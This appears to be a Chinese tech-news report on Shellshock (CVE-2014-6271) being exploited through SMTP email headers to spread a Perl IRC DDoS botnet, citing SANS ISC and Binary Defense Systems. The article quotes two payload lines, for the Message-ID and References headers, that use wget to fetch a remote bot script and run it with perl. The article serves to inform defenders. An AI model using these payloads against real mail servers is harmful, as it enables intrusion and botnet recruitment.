Bash破殼漏洞(ShellShock，CVE-2014-6271)新的利用方法又來(lái)了!根據(jù)互聯(lián)網(wǎng)風(fēng)暴中心( SANS InternetStorm Center )最新消息：破殼漏洞最新利用方法引發(fā)的新一輪攻擊正在醞釀中，這一次，破殼漏洞形成的僵尸網(wǎng)絡(luò)利用的是郵件服務(wù)器SMTP主機(jī)，目標(biāo)是全球SMTP網(wǎng)關(guān)!

[[121995]]

黑客們?cè)谠噲D破壞SMTP系統(tǒng)

“嘿，我的老板啊，這次互聯(lián)網(wǎng)風(fēng)暴意味著什么你造嗎?意味著我給你回郵件都是危險(xiǎn)的!”(算了，我不回你了啊= =)

這次“破殼”利用的就是感染SMTP網(wǎng)關(guān)，試圖在MTAs / MDAs中尋找可利用弱點(diǎn)，然后攻擊者把惡意代碼隱藏在消息數(shù)據(jù)報(bào)頭中!

互聯(lián)網(wǎng)風(fēng)暴中心描述了一個(gè)用Perl編寫(xiě)的IRC DDoS Robot，其Payload擁有“獲取和執(zhí)行遠(yuǎn)程代碼的能力”。

下面一個(gè)圖片就是包含“破殼”有效載荷的初始郵件攻擊例子:

二進(jìn)制防御系統(tǒng)BDS(Binary Defense Systems)已經(jīng)主動(dòng)偵查到最新的攻擊細(xì)節(jié)。 那些已被破壞系統(tǒng)試圖通過(guò)破殼漏洞傳播僵尸網(wǎng)絡(luò)，并在每個(gè)主要頭字段使用“破殼”漏洞下載僵尸網(wǎng)絡(luò)腳本。攻擊者利用的字段有：“To:”字段、“From:”字段、 “Subject”字段、 “Date:”字段、 “Message ID:” 等等還有其他未發(fā)現(xiàn)字段

Message-ID:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend

References:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend

BDS還還透露：

“為了感染SMTP網(wǎng)關(guān)，并把它添加到現(xiàn)有僵尸網(wǎng)絡(luò)設(shè)備中去，有一個(gè)curl/wget/fetch/perl/lwp/etc的方法正在試圖從耶利哥安全團(tuán)隊(duì)(Jericho Security Team)摧毀基于perl的僵尸網(wǎng)絡(luò)。”

自從九月初發(fā)現(xiàn)“破殼”起，彈震癥漏洞已經(jīng)針對(duì)目標(biāo)，在不同類(lèi)型的設(shè)備上重復(fù)利用了許多次。許多安全專(zhuān)家也相繼發(fā)現(xiàn)了多次利用“破殼”漏洞攻擊全球設(shè)備的僵尸網(wǎng)絡(luò)，包括攻擊 VOIP系統(tǒng) 和利用競(jìng)選傳播惡意軟件的混亂的僵尸網(wǎng)絡(luò)。

蜜罐由專(zhuān)家AlienVault實(shí)驗(yàn)室檢測(cè)到試圖利用“破殼”漏洞的兩個(gè)不同惡意軟件樣本，消息披露至此不超過(guò)48小時(shí)。

9月底，火眼研究室(FireEye)也預(yù)言:“從惡意流量上觀察發(fā)現(xiàn)，試圖利用Bash bug的大規(guī)模網(wǎng)絡(luò)攻擊正在路上。”